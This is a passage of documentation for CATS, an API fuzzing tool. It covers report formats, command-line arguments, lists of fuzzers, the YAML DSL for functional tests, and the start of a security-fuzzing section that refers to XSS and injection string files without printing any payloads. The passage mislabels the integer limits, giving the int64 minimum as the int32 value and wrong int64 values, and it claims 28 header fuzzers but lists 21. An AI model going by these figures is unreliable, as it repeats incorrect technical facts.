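For example, a hedged sketch of supplying a path parameter (the petId name below is hypothetical) via --urlParams:

> cats --contract=openapi.yaml --server=http://localhost:8080 --headers=headers.yml --urlParams="petId:123"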

Interpreting Results

HTML_JS

HTML_JS is the default report produced by CATS. The execution report is placed in a folder called cats-report/TIMESTAMP or cats-report, depending on the --timestampReports argument. The folder will be created inside the current folder (if it doesn't exist) and for each run a new subfolder will be created with the TIMESTAMP value when the run started. This allows you to have a history of the runs. The report itself is in the index.html file, where you can:

  • filter test runs based on the result: All, Success, Warn and Error
  • filter based on the Fuzzer so that you can only see the runs for that specific Fuzzer
  • see summary with all the tests with their corresponding path against they were run, and the result
  • have ability to click on any tests and get details about the Scenario being executed, Expected Result, Actual result as well as request/response details

Along with the summary from index.html, each individual test will have a specific TestXXX.html page with more details, as well as a JSON version of the test which can later be replayed using > cats replay TestXXX.json.

Understanding the Result Reason values:

  • Unexpected Exception - reported as error; this might indicate a possible bug in the service or a corner case that is not handled correctly by CATS
  • Not Matching Response Schema - reported as a warn; this indicates that the service returns an expected response code and a response body, but the response body does not match the schema defined in the contract
  • Undocumented Response Code - reported as a warn; this indicates that the service returns an expected response code, but the response code is not documented in the contract
  • Unexpected Response Code - reported as an error; this indicates a possible bug in the service - the response code is documented, but is not expected for this scenario
  • Unexpected Behaviour - reported as an error; this indicates a possible bug in the service - the response code is neither documented nor expected for this scenario
  • Not Found - reported as an error in order to force providing more context; this indicates that CATS needs additional business context in order to run successfully - you can do this using the --refData and/or --urlParams arguments

This is the summary page:


And this is what you get when you click on a specific test: 



HTML_ONLY

This format is similar to HTML_JS, but you cannot do any filtering or sorting.

JUNIT

CATS also supports JUNIT output. The output will be a single testsuite that will incorporate all tests grouped by Fuzzer name. As the JUNIT format does not have the concept of a warning, the following mapping is used:

  • CATS error is reported as JUNIT error
  • JUNIT failure is not used at all
  • CATS warn is reported as JUNIT skipped
  • CATS skipped is reported as JUNIT disabled

The JUNIT report is written as junit.xml in the cats-report folder. Individual tests, both as .html and .json will also be created.

Slicing Strategies for Running Cats

CATS has a significant number of Fuzzers. Currently, 89 and growing. Some of the Fuzzers execute multiple tests for every given field within the request. For example the ControlCharsOnlyInFieldsFuzzer has 63 control char values that will be tried for each request field. If a request has 15 fields, for example, this will result in 945 tests. Considering that there are additional Fuzzers with the same magnitude of generated tests, you can easily get to 20k tests being executed on a typical run. This will result in huge reports and long run times (i.e. minutes, rather than seconds).

Below are some recommended strategies on how you can separate the tests in chunks which can be executed as stages in a deployment pipeline, one after the other.

Split by Endpoints

You can use the --paths=PATH argument to run CATS sequentially for each path.
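
As a sketch, assuming a POSIX shell and that cats list --paths --contract=openapi.yaml prints one path per line (the exact output format may differ, so adjust the parsing accordingly), a pipeline stage could iterate over the paths like this:

for p in $(cats list --paths --contract=openapi.yaml); do
  cats --contract=openapi.yaml --server=http://localhost:8080 --paths="$p"
done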

Split by Fuzzer Category

You can use the --checkXXX arguments to run CATS only with specific categories of Fuzzers, like: --checkHttp, --checkFields, etc.

Split by Fuzzer Type

You can use various arguments like --fuzzers=Fuzzer1,Fuzzer2 or --skipFuzzers=Fuzzer1,Fuzzer2 to either include or exclude specific Fuzzers. For example, you can run all Fuzzers except for the ControlChars and Whitespaces ones like this: --skipFuzzers=ControlChars,Whitespaces. This will skip all Fuzzers containing these strings in their name. Afterwards, you can create an additional run only with these Fuzzers: --fuzzers=ControlChars,Whitespaces.

These are just some recommendations on how you can split the types of tests cases. Depending on how complex your API is, you might go with a combination of the above or with even more granular splits.

Please note that because ControlChars, Emojis and Whitespaces generate a huge number of tests even for small OpenAPI contracts, they are disabled by default. You can enable them using the --includeControlChars, --includeWhitespaces and/or --includeEmojis arguments. The recommendation is to run them in separate runs so that you get manageable reports and optimal running times.
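
As an illustration only, a two-stage split could first run everything except the heavy Fuzzers and then run them in a dedicated stage:

> cats --contract=openapi.yaml --server=http://localhost:8080 --skipFuzzers=ControlChars,Whitespaces,Emojis
> cats --contract=openapi.yaml --server=http://localhost:8080 --includeControlChars --includeWhitespaces --includeEmojis --fuzzers=ControlChars,Whitespaces,Emojis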

Ignoring Specific HTTP Responses

By default, CATS will report WARNs and ERRORs according to the specific behaviour of each Fuzzer. There are cases though when you might want to focus only on critical bugs. You can use the --ignoreResponseXXX arguments to supply a list of response codes, response sizes, word counts, line counts or response body regexes that should be ignored as issues (overriding the Fuzzer behaviour) and reported as success instead of WARN or ERROR. For example, if you want CATS to report ERRORs only when there is an Exception or the service returns a 500, you can use this: --ignoreResponseCodes="2xx,4xx".

Ignoring Undocumented Response Code Checks

You can also choose to ignore checks done by the Fuzzers. By default, each Fuzzer has an expected response code based on the scenario under test and will report a WARN if the service returns the expected response code but that code is not documented inside the contract. You can make CATS ignore the undocumented response code checks (i.e. checking that the received response code is documented inside the contract) using the --ignoreResponseCodeUndocumentedCheck argument. CATS will then report these cases as SUCCESS instead of WARN.
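
An illustrative invocation:

> cats --contract=openapi.yaml --server=http://localhost:8080 --headers=headers.yml --ignoreResponseCodeUndocumentedCheck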

Ignoring Response Body Checks

Additionally, you can also choose to ignore the response body checks. By default, on top of checking the expected response code, each Fuzzer will check if the response body matches what is defined in the contract and will report a WARN if it doesn't. You can make CATS ignore the response body checks using the --ignoreResponseBodyCheck argument. CATS will then report these cases as SUCCESS instead of WARN.

Replaying Tests

When CATS runs, for each test, it will export both an HTML file that will be linked in the final report and individual JSON files. The JSON files can be used to replay that test. When replaying a test (or a list of tests), CATS won't produce any report. The output will be solely available in the console. This is useful when you want to see the exact behaviour of the specific test or attach it in a bug report for example.

The syntax for replaying tests is the following:

> cats replay "Test1,Test233,Test15.json,dir/Test19.json"

Some notes on the above example:

  • test names can be separated by comma ,
  • if you provide a json extension to a test name, that file will be searched for as a path, i.e. it will search for Test15.json in the current folder and Test19.json in the dir folder
  • if you don't provide a json extension to a test name, it will search for that test in the cats-report folder i.e. cats-report/Test1.json and cats-report/Test233.json

Available Commands

To list all available commands, run:

> cats -h

All available subcommands are listed below:

  • > cats help or cats -h will list all available options

  • > cats list --fuzzers will list all the existing fuzzers, grouped on categories

  • > cats list --fieldsFuzzingStrategy will list all the available fields fuzzing strategies

  • > cats list --paths --contract=CONTRACT will list all the paths available within the contract

  • > cats replay "test1,test2" will replay the given tests test1 and test2

  • > cats fuzz will fuzz based on a given request template, rather than an OpenAPI contract

  • > cats run will run functional and targeted security tests written in the CATS YAML format

  • > cats lint will run OpenAPI contract linters, also called ContractInfoFuzzers

Available arguments

  • --contract=LOCATION_OF_THE_CONTRACT supplies the location of the OpenApi or Swagger contract.
  • --server=URL supplies the URL of the service implementing the contract.
  • --basicauth=USR:PWD supplies a username:password pair, in case the service uses basic auth.
  • --fuzzers=LIST_OF_FUZZERS supplies a comma separated list of fuzzers. The supplied list of Fuzzers can be partial names, not full Fuzzer names. CATS will check for all Fuzzers containing the supplied strings. If the argument is not supplied, all fuzzers will be run.
  • --log=PACKAGE:LEVEL can configure custom log level for a given package. You can provide a comma separated list of packages and levels. This is helpful when you want to see full HTTP traffic: --log=org.apache.http.wire:debug or suppress CATS logging: --log=com.endava.cats:warn
  • --paths=PATH_LIST supplies a comma separated list of OpenApi paths to be tested. If no path is supplied, all paths will be considered.
  • --skipPaths=PATH_LIST a comma separated list of paths to ignore. If no path is supplied, no path will be ignored
  • --fieldsFuzzingStrategy=STRATEGY specifies which strategy will be used for field fuzzing. Available strategies are ONEBYONE, SIZE and POWERSET. More information on field fuzzing can be found in the sections below.
  • --maxFieldsToRemove=NUMBER specifies the maximum number of fields to be removed when using the SIZE fields fuzzing strategy.
  • --refData=FILE specifies the file containing static reference data which must be fixed in order to have valid business requests. This is a YAML file. It is explained further in the sections below.
  • --headers=FILE specifies a file containing headers that will be added when sending payloads to the endpoints. You can use this option to add oauth/JWT tokens for example.
  • --edgeSpacesStrategy=STRATEGY specifies how to expect the server to behave when sending trailing and prefix spaces within fields. Possible values are trimAndValidate and validateAndTrim.
  • --sanitizationStrategy=STRATEGY specifies how to expect the server to behave when sending Unicode Control Chars and Unicode Other Symbols within the fields. Possible values are sanitizeAndValidate and validateAndSanitize
  • --urlParams A comma separated list of 'name:value' pairs of parameters to be replaced inside the URLs. This is useful when you have static parameters in URLs (like 'version' for example).
  • --functionalFuzzerFile a file used by the FunctionalFuzzer that will be used to create user-supplied payloads.
  • --skipFuzzers=LIST_OF_FUZZERS a comma separated list of fuzzers that will be skipped for all paths. You can either provide full Fuzzer names (for example: --skipFuzzers=VeryLargeStringsFuzzer) or partial Fuzzer names (for example: --skipFuzzers=VeryLarge). CATS will check if the Fuzzer names contain the string you provide in the argument's value.
  • --skipFields=field1,field2#subField1 a comma separated list of fields that will be skipped by replacement Fuzzers like EmptyStringsInFields, NullValuesInFields, etc.
  • --httpMethods=PUT,POST,etc a comma separated list of HTTP methods that will be used to filter which http methods will be executed for each path within the contract
  • --securityFuzzerFile A file used by the SecurityFuzzer that will be used to inject special strings in order to exploit possible vulnerabilities
  • --printExecutionStatistics If supplied (no value needed), prints a summary of execution times for each endpoint and HTTP method. By default this will print a summary for each endpoint: max, min and average. If you want detailed reports you must supply --printExecutionStatistics=detailed
  • --timestampReports If supplied (no value needed), it will output the report still inside the cats-report folder, but in a sub-folder with the current timestamp
  • --reportFormat=FORMAT Specifies the format of the CATS report. Supported formats: HTML_ONLY, HTML_JS or JUNIT. You can use HTML_ONLY if you want the report to not contain any Javascript. This is useful in CI environments due to Javascript content security policies. Default is HTML_JS which includes some sorting and filtering capabilities.
  • --useExamples If true (default value when not supplied) then CATS will use examples supplied in the OpenAPI contact. If false CATS will rely only on generated values
  • --checkFields If supplied (no value needed), it will only run the Field Fuzzers
  • --checkHeaders If supplied (no value needed), it will only run the Header Fuzzers
  • --checkHttp If supplied (no value needed), it will only run the HTTP Fuzzers
  • --includeWhitespaces If supplied (no value needed), it will include the Whitespaces Fuzzers
  • --includeEmojis If supplied (no value needed), it will include the Emojis Fuzzers
  • --includeControlChars If supplied (no value needed), it will include the ControlChars Fuzzers
  • --includeContract If supplied (no value needed), it will include ContractInfoFuzzers
  • --sslKeystore Location of the JKS keystore holding certificates used when authenticating calls using one-way or two-way SSL
  • --sslKeystorePwd The password of the sslKeystore
  • --sslKeyPwd The password of the private key from the sslKeystore
  • --proxyHost The proxy server's host name (if running behind proxy)
  • --proxyPort The proxy server's port number (if running behind proxy)
  • --maxRequestsPerMinute Maximum number of requests per minute; this is useful when APIs have rate limiting implemented; default is 10000
  • --connectionTimeout Time period in seconds which CATS should establish a connection with the server; default is 10 seconds
  • --writeTimeout Maximum time of inactivity in seconds between two data packets when sending the request to the server; default is 10 seconds
  • --readTimeout Maximum time of inactivity in seconds between two data packets when waiting for the server's response; default is 10 seconds
  • --dryRun If provided, it will simulate a run of the service with the supplied configuration. The run won't produce a report, but will show how many tests will be generated and run for each OpenAPI endpoint
  • --ignoreResponseCodes HTTP_CODES_LIST a comma separated list of HTTP response codes that will be considered as SUCCESS, even if the Fuzzer will typically report it as WARN or ERROR. You can use response code families as 2xx, 4xx, etc. If provided, all Contract Fuzzers will be skipped.
  • --ignoreResponseSize SIZE_LIST a comma separated list of response sizes that will be considered as SUCCESS, even if the Fuzzer will typically report it as WARN or ERROR
  • --ignoreResponseWords COUNT_LIST a comma separated list of words count in the response that will be considered as SUCCESS, even if the Fuzzer will typically report it as WARN or ERROR
  • --ignoreResponseLines LINES_COUNT a comma separated list of lines count in the response that will be considered as SUCCESS, even if the Fuzzer will typically report it as WARN or ERROR
  • --ignoreResponseRegex a REGEX that will match against the response that will be considered as SUCCESS, even if the Fuzzer will typically report it as WARN or ERROR
  • --tests TESTS_LIST a comma separated list of executed tests in JSON format from the cats-report folder. If you supply the list without the .json extension CATS will search the test in the cats-report folder
  • --ignoreResponseCodeUndocumentedCheck If supplied (not value needed) it won't check if the response code received from the service matches the value expected by the fuzzer and will return the test result as SUCCESS instead of WARN
  • --ignoreResponseBodyCheck If supplied (not value needed) it won't check if the response body received from the service matches the schema supplied inside the contract and will return the test result as SUCCESS instead of WARN
  • --blackbox If supplied (no value needed) it will ignore all response codes except for 5XX which will be returned as ERROR. This is similar to --ignoreResponseCodes="2xx,4xx"
  • --contentType A custom mime type if the OpenAPI spec uses content type negotiation versioning.
  • --output The path where the CATS report will be written. Default is cats-report in the current directory
  • --skipReportingForIgnoredCodes Skip reporting entirely for any ignored responses matched by the --ignoreResponseXXX arguments

> cats --contract=my.yml --server=http://localhost:8080 --checkHeaders

This will run CATS against http://localhost:8080 using my.yml as an API spec and will only run the Header Fuzzers.

Available Fuzzers

To get a list of fuzzers run cats list --fuzzers. A list of all available fuzzers will be returned, along with a short description for each.

There are multiple categories of Fuzzers available:

  • Field Fuzzers which target request body fields or path parameters
  • Header Fuzzers which target HTTP headers
  • HTTP Fuzzers which target just the interaction with the service (without fuzzing fields or headers)

Additional checks which are not actually using any fuzzing, but leverage the CATS internal model of running the tests as Fuzzers:

  • ContractInfo Fuzzers which checks the contract for API good practices
  • Special Fuzzers a special category which need further configuration and are focused on more complex activities like functional flow, security testing or supplying your own request templates, rather than OpenAPI specs

Field Fuzzers

CATS currently has 42 registered Field Fuzzers:

  • BooleanFieldsFuzzer - iterate through each Boolean field and send random strings in the targeted field
  • DecimalFieldsLeftBoundaryFuzzer - iterate through each Number field (either float or double) and send requests with outside the range values on the left side in the targeted field
  • DecimalFieldsRightBoundaryFuzzer - iterate through each Number field (either float or double) and send requests with outside the range values on the right side in the targeted field
  • DecimalValuesInIntegerFieldsFuzzer - iterate through each Integer field and send requests with decimal values in the targeted field
  • EmptyStringValuesInFieldsFuzzer - iterate through each field and send requests with empty String values in the targeted field
  • ExtremeNegativeValueDecimalFieldsFuzzer - iterate through each Number field and send requests with the lowest value possible (-999999999999999999999999999999999999999999.99999999999 for no format, -3.4028235E38 for float and -1.7976931348623157E308 for double) in the targeted field
  • ExtremeNegativeValueIntegerFieldsFuzzer - iterate through each Integer field and send requests with the lowest value possible (-9223372036854775808 for int32 and -18446744073709551616 for int64) in the targeted field
  • ExtremePositiveValueDecimalFieldsFuzzer - iterate through each Number field and send requests with the highest value possible (999999999999999999999999999999999999999999.99999999999 for no format, 3.4028235E38 for float and 1.7976931348623157E308 for double) in the targeted field
  • ExtremePositiveValueInIntegerFieldsFuzzer - iterate through each Integer field and send requests with the highest value possible (9223372036854775807 for int32 and 18446744073709551614 for int64) in the targeted field
  • IntegerFieldsLeftBoundaryFuzzer - iterate through each Integer field and send requests with outside the range values on the left side in the targeted field
  • IntegerFieldsRightBoundaryFuzzer - iterate through each Integer field and send requests with outside the range values on the right side in the targeted field
  • InvalidValuesInEnumsFieldsFuzzer - iterate through each ENUM field and send invalid values
  • LeadingWhitespacesInFieldsTrimValidateFuzzer - iterate through each field and send requests with Unicode whitespaces and invisible separators prefixing the current value in the targeted field
  • LeadingControlCharsInFieldsTrimValidateFuzzer - iterate through each field and send requests with Unicode control chars prefixing the current value in the targeted field
  • LeadingSingleCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values prefixed with single code points emojis
  • LeadingMultiCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values prefixed with multi code points emojis
  • MaxLengthExactValuesInStringFieldsFuzzer - iterate through each String fields that have maxLength declared and send requests with values matching the maxLength size/value in the targeted field
  • MaximumExactValuesInNumericFieldsFuzzer - iterate through each Number and Integer fields that have maximum declared and send requests with values matching the maximum size/value in the targeted field
  • MinLengthExactValuesInStringFieldsFuzzer - iterate through each String fields that have minLength declared and send requests with values matching the minLength size/value in the targeted field
  • MinimumExactValuesInNumericFieldsFuzzer - iterate through each Number and Integer fields that have minimum declared and send requests with values matching the minimum size/value in the targeted field
  • NewFieldsFuzzer - send a 'happy' flow request and add a new field inside the request called 'catsFuzzyField'
  • NullValuesInFieldsFuzzer - iterate through each field and send requests with null values in the targeted field
  • OnlyControlCharsInFieldsTrimValidateFuzzer - iterate through each field and send values with control chars only
  • OnlyWhitespacesInFieldsTrimValidateFuzzer - iterate through each field and send values with unicode separators only
  • OnlySingleCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values with single code point emojis only
  • OnlyMultiCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values with multi code point emojis only
  • RemoveFieldsFuzzer - iterate through each request fields and remove certain fields according to the supplied 'fieldsFuzzingStrategy'
  • StringFieldsLeftBoundaryFuzzer - iterate through each String field and send requests with outside the range values on the left side in the targeted field
  • StringFieldsRightBoundaryFuzzer - iterate through each String field and send requests with outside the range values on the right side in the targeted field
  • StringFormatAlmostValidValuesFuzzer - iterate through each String field and get its 'format' value (i.e. email, ip, uuid, date, datetime, etc); send requests with values which are almost valid for that format (i.e. an email address missing its top-level domain, 888.1.1. for ip, etc) in the targeted field
  • StringFormatTotallyWrongValuesFuzzer - iterate through each String field and get its 'format' value (i.e. email, ip, uuid, date, datetime, etc); send requests with values which are totally wrong (i.e. abcd for email, 1244. for ip, etc) in the targeted field
  • StringsInNumericFieldsFuzzer - iterate through each Integer (int, long) and Number field (float, double) and send requests having the fuzz string value in the targeted field
  • TrailingWhitespacesInFieldsTrimValidateFuzzer - iterate through each field and send requests with trailing with Unicode whitespaces and invisible separators in the targeted field
  • TrailingControlCharsInFieldsTrimValidateFuzzer - iterate through each field and send requests with trailing with Unicode control chars in the targeted field
  • TrailingSingleCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values trailed with single code point emojis
  • TrailingMultiCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values trailed with multi code point emojis
  • VeryLargeStringsFuzzer - iterate through each String field and send requests with very large values (40000 characters) in the targeted field
  • WithinControlCharsInFieldsSanitizeValidateFuzzer - iterate through each field and send values containing unicode control chars
  • WithinSingleCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values containing single code point emojis
  • WithinMultiCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values containing multi code point emojis
  • ZalgoTextInStringFieldsValidateSanitizeFuzzer - iterate through each field and send values containing zalgo text

You can run only these Fuzzers by supplying the --checkFields argument.

Header Fuzzers

CATS currently has 28 registered Header Fuzzers:

  • AbugidasCharsInHeadersFuzzer - iterate through each header and send requests with abugidas chars in the targeted header
  • CheckSecurityHeadersFuzzer - check all responses for good practices around Security related headers like: [{name=Cache-Control, value=no-store}, {name=X-XSS-Protection, value=1; mode=block}, {name=X-Content-Type-Options, value=nosniff}, {name=X-Frame-Options, value=DENY}]
  • DummyAcceptHeadersFuzzer - send a request with a dummy Accept header and expect to get 406 code
  • DummyContentTypeHeadersFuzzer - send a request with a dummy Content-Type header and expect to get 415 code
  • DuplicateHeaderFuzzer - send a 'happy' flow request and duplicate an existing header
  • EmptyStringValuesInHeadersFuzzer - iterate through each header and send requests with empty String values in the targeted header
  • ExtraHeaderFuzzer - send a 'happy' flow request and add an extra field inside the request called 'Cats-Fuzzy-Header'
  • LargeValuesInHeadersFuzzer - iterate through each header and send requests with large values in the targeted header
  • LeadingControlCharsInHeadersFuzzer - iterate through each header and prefix values with control chars
  • LeadingWhitespacesInHeadersFuzzer - iterate through each header and prefix value with unicode separators
  • LeadingSpacesInHeadersFuzzer - iterate through each header and send requests with spaces prefixing the value in the targeted header
  • RemoveHeadersFuzzer - iterate through each header and remove different combinations of them
  • OnlyControlCharsInHeadersFuzzer - iterate through each header and replace value with control chars
  • OnlySpacesInHeadersFuzzer - iterate through each header and replace value with spaces
  • OnlyWhitespacesInHeadersFuzzer - iterate through each header and replace value with unicode separators
  • TrailingSpacesInHeadersFuzzer - iterate through each header and send requests with trailing spaces in the targeted header
  • TrailingControlCharsInHeadersFuzzer - iterate through each header and trail values with control chars
  • TrailingWhitespacesInHeadersFuzzer - iterate through each header and trail values with unicode separators
  • UnsupportedAcceptHeadersFuzzer - send a request with an unsupported Accept header and expect to get 406 code
  • UnsupportedContentTypesHeadersFuzzer - send a request with an unsupported Content-Type header and expect to get 415 code
  • ZalgoTextInHeadersFuzzer - iterate through each header and send requests with zalgo text in the targeted header

You can run only these Fuzzers by supplying the --checkHeaders argument.

HTTP Fuzzers

CATS currently has 6 registered HTTP Fuzzers:

  • BypassAuthenticationFuzzer - check if an authentication header is supplied; if yes try to make requests without it
  • DummyRequestFuzzer - send a dummy json request {'cats': 'cats'}
  • HappyFuzzer - send a request with all fields and headers populated
  • HttpMethodsFuzzer - iterate through each undocumented HTTP method and send an empty request
  • MalformedJsonFuzzer - send a malformed json request which has the String 'bla' at the end
  • NonRestHttpMethodsFuzzer - iterate through a list of HTTP method specific to the WebDav protocol that are not expected to be implemented by REST APIs

You can run only these Fuzzers by supplying the --checkHttp argument.

ContractInfo Fuzzers or OpenAPI Linters

Usually a good OpenAPI contract must follow several good practices in order to make it easily digestible by the service clients and act as much as possible as self-sufficient documentation:

  • follow good practices around naming the contract elements like paths, requests, responses
  • always use plural for the path names, separate path words with hyphens/underscores, use camelCase or snake_case for any json types and properties
  • provide tags for all operations in order to avoid breaking code generation on some languages and have a logical grouping of the API operations
  • provide good description for all paths, methods and request/response elements
  • provide meaningful responses for POST, PATCH and PUT requests
  • provide examples for all requests/response elements
  • provide structural constraints for (ideally) all request/response properties (min, max, regex)
  • have some sort of CorrelationIds/TraceIds within headers
  • have at least a security schema in place
  • avoid having the API version part of the paths
  • document response codes for both "happy" and "unhappy" flows
  • avoid using xml payloads unless there is a really good reason (like documenting an old API for example)
  • json types and properties do not use the same naming (like having a Pet with a property named pet)

CATS currently has 9 registered ContractInfo Fuzzers:

  • HttpStatusCodeInValidRangeFuzzer - verifies that all HTTP response codes are within the range of 100 to 599
  • NamingsContractInfoFuzzer - verifies that all OpenAPI contract elements follow REST API naming good practices
  • PathTagsContractInfoFuzzer - verifies that all OpenAPI paths contain tags elements and checks if the tags elements match the ones declared at the top level
  • RecommendedHeadersContractInfoFuzzer - verifies that all OpenAPI contract paths contain recommended headers like: CorrelationId/TraceId, etc.
  • RecommendedHttpCodesContractInfoFuzzer - verifies that the current path contains all recommended HTTP response codes for all operations
  • SecuritySchemesContractInfoFuzzer - verifies if the OpenApi contract contains valid security schemas for all paths, either globally configured or per path
  • TopLevelElementsContractInfoFuzzer - verifies that all OpenAPI contract level elements are present and provide meaningful information: API description, documentation, title, version, etc.
  • VersionsContractInfoFuzzer - verifies that a given path doesn't contain versioning information
  • XmlContentTypeContractInfoFuzzer - verifies that no OpenAPI contract path offers application/xml as a Content-Type for requests or responses

You can run only these Fuzzers using > cats lint --contract=CONTRACT.

Special Fuzzers

FunctionalFuzzer

Writing Custom Tests

You can leverage CATS super-powers of self-healing and payload generation in order to write functional tests. This is achieved using the so-called FunctionalFuzzer, which is not a Fuzzer per se, but was named as such for consistency. The functional tests are written in a YAML file using a simple DSL. The DSL supports adding identifiers, descriptions, assertions as well as passing variables between tests. The cool thing is that, by leveraging the fact that CATS generates valid payloads, you only need to override values for specific fields. The rest of the information will be populated by CATS using valid data, just like a 'happy' flow request.

It's important to note that reference data won't get replaced when using the FunctionalFuzzer. So if there are reference data fields, you must also supply those in the FunctionalFuzzer.

The FunctionalFuzzer will only trigger if a valid functionalFuzzer.yml file is supplied. The file has the following syntax:

/path:
  testNumber:
    description: Short description of the test
    prop: value
    prop#subprop: value
    prop7:
      - value1
      - value2
      - value3
    oneOfSelection:
      element#type: "Value"
    expectedResponseCode: HTTP_CODE
    httpMethod: HTTP_METHOD

And a typical run will look like:

> cats run functionalFuzzer.yml -c contract.yml -s http://localhost:8080

This is a description of the elements within the functionalFuzzer.yml file:

  • you can supply a description of the test. This will be set as the Scenario description. If you don't supply a description the testNumber will be used instead.
  • you can have multiple tests under the same path: test1, test2, etc.
  • expectedResponseCode is mandatory, otherwise the Fuzzer will ignore this test. The expectedResponseCode tells CATS what to expect from the service when sending this test.
  • at most one of the properties can have multiple values. When this happens, that test will actually become a list of tests, one for each of the values supplied. For instance, in the example above prop7 has 3 values, so it will actually result in 3 tests, one for each value.
  • tests within the file are executed in the declared order. This is why you can have outputs from one test act as inputs for the next one(s) (see the next section for details).
  • if the supplied httpMethod doesn't exist in the OpenAPI given path, a warning will be issued and no test will be executed
  • if the supplied httpMethod is not a valid HTTP method, a warning will be issued and no test will be executed
  • if the request payload uses a oneOf element to allow multiple request types, you can control which of the possible types the FunctionalFuzzer will apply to using the oneOfSelection keyword. The value of the oneOfSelection keyword must match the fully qualified name of the discriminator.
  • if no oneOfSelection is supplied, and the request payload accepts multiple oneOf elements, then a custom test will be created for each type of payload
  • the file uses Json path syntax for all the properties you can supply; you can separate elements through # as in the example above instead of .

Dealing with oneOf, anyOf

When you have request payloads which can take multiple object types, you can use the oneOfSelection keyword to specify which of the possible object types is required by the FunctionalFuzzer. If you don't provide this element, all combinations will be considered. If you supply a value, this must be exactly the one used in the discriminator.

Correlating Tests

As CATS mostly relies on generated data, with small help from some reference data, testing complex business scenarios with the pre-defined Fuzzers is not possible. Suppose we have an endpoint that creates data (doing a POST), and we want to check its existence (via GET). We need a way to get some identifier from the POST call and send it to the GET call. This is now possible using the FunctionalFuzzer. The functionalFuzzerFile can have an output entry where you can state a variable name and its fully qualified name from the response in order to set its value. You can then refer to the variable using ${variable_name} in another test in order to use its value.

Here is an example:

/pet:
  test_1:
    description: Create a Pet
    httpMethod: POST
    name: "My Pet"
    expectedResponseCode: 200
    output:
      petId: pet#id
/pet/{id}:
  test_2:
    description: Get a Pet
    id: ${petId}
    expectedResponseCode: 200

Suppose the test_1 execution outputs:

{
  "pet": {
    "id": 2
  }
}

When executing test_1 the value of the pet id will be stored in the petId variable (value 2). When executing test_2 the id parameter will be replaced with the petId variable (value 2) from the previous case.

Please note: variables are visible across all custom tests; please be careful with the naming as they will get overridden.

Verifying responses

The FunctionalFuzzer can verify more than just the expectedResponseCode. This is achieved using the verify element. This is an extended version of the above functionalFuzzer.yml file.

/pet:
  test_1:
    description: Create a Pet
    httpMethod: POST
    name: "My Pet"
    expectedResponseCode: 200
    output:
      petId: pet#id
    verify:
      pet#name: "Baby"
      pet#id: "[0-9]+"
/pet/{id}:
  test_2:
    description: Get a Pet
    id: ${petId}
    expectedResponseCode: 200

Considering the above file:

  • the FunctionalFuzzer will check if the response has the 2 elements pet#name and pet#id
  • if the elements are found, it will check that the pet#name has the Baby value and that the pet#id is numeric

The following json response will pass test_1:

{
  "pet": {
    "id": 2,
    "name": "Baby"
  }
}

But this one won't (pet#name is missing):

{
  "pet": {
    "id": 2
  }
}

You can also refer to request fields in the verify section by using the ${request#..} qualifier. Using the above example, by having the following verify section:

/pet:
  test_1:
    description: Create a Pet
    httpMethod: POST
    name: "My Pet"
    expectedResponseCode: 200
    output:
      petId: pet#id
    verify:
      pet#name: "${request#name}"
      pet#id: "[0-9]+"

It will verify if the response contains a pet#name element and that its value equals My Pet as sent in the request.

Some notes:

  • verify parameters support Java regexes as values
  • you can supply more than one parameter to check (as seen above)
  • if at least one of the parameters is not present in the response, CATS will report an error
  • if all parameters are found and have valid values, but the response code is not matched, CATS will report a warning
  • if all the parameters are found and match their values, and the response code is as expected, CATS will report a success

Working with additionalProperties in FunctionalFuzzer

You can also set additionalProperties fields through the functionalFuzzerFile using the same syntax as for Setting additionalProperties in Reference Data.

FunctionalFuzzer Reserved keywords

The following keywords are reserved in FunctionalFuzzer tests: output, expectedResponseCode, httpMethod, description, oneOfSelection, verify, additionalProperties, topElement and mapValues.

Security Fuzzer

Although CATS is not a security testing tool, you can use it to test basic security scenarios by fuzzing specific fields with different sets of nasty strings. The behaviour is similar to the FunctionalFuzzer. You can use the exact same elements for output variables, test correlation, verifying responses and so forth, with the addition that you must also specify a targetFields and/or targetFieldTypes and a stringsFile element. A typical securityFuzzerFile will look like this:

/pet:
  test_1:
    description: Run XSS scenarios
    name: "My Pet"
    expectedResponseCode: 200
    httpMethod: all
    targetFields:
      - pet#id
      - pet#description
    stringsFile: xss.txt

And a typical run:

> cats run securityFuzzerFile.yml -c contract.yml -s http://localhost:8080

You can also supply output, httpMethod, oneOfSelection and/or verify (with the same behaviour as within the FunctionalFuzzer) if they are relevant to your case.

The file uses Json path syntax for all the properties you can supply; you can separate elements through # as in the example instead of ..

This is what the SecurityFuzzer will do after parsing the above securityFuzzerFile:

  • it will add the fixed value "My Pet" to all the request for the field name
  • for each field specified in the targetFields i.e. pet#id and pet#description it will create requests for each line from the xss.txt file and supply those values in each field
  • if you consider the xss.txt sample file included in the CATS repo, this means that it will send 21 requests targeting pet#id and 21 requests targeting pet#description, i.e. a total of 42 tests
  • for each of these 42 tests, the SecurityFuzzer will expect a 200 response code. If another response code is returned, then CATS will report the test as an error.

If you want the above logic to apply to all paths, you can use all as the path name:

all:
  test_1:
    description: Run XSS scenarios
    name: "My Pet"
    expectedResponseCode: 200
    httpMethod: all
    targetFields:
      - pet#id
      - pet#description
    stringsFile: xss.txt

Instead of specifying the field names, you can broaden the scope to target certain field types. For example, if you want to test for XSS in all string fields, you can have the following securityFuzzerFile:

all:
  test_1:
    description: Run XSS scenarios
    name: "My Pet"
    expectedResponseCode: 200
    httpMethod: all
    targetFieldTypes:
      - string
    stringsFile: xss.txt

As an idea on how to create security tests, you can split the nasty strings into multiple files of interest in your particular context. You can have a sql_injection.txt, an xss.txt, a command_injection.txt and so on. For each of these files, you can create a test entry in the securityFuzzerFile where you include the fields you think are meaningful for these types of tests. (It was a deliberate choice, for now, not to include all fields by default.) The expectedResponseCode should be tweaked according to your particular context. Your service might sanitize data before validation, in which case it may be perfectly valid to expect a 200, or it might validate the fields directly, in which case a 400 would be the expected response. A 500 will usually mean something was not handled properly and might signal a possible bug.
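
As an illustration of this idea (the file names, fields and expected codes below are assumptions for the sketch), a securityFuzzerFile could contain one test entry per nasty-strings file:

all:
  test_1:
    description: Run XSS scenarios in string fields
    expectedResponseCode: 200
    httpMethod: all
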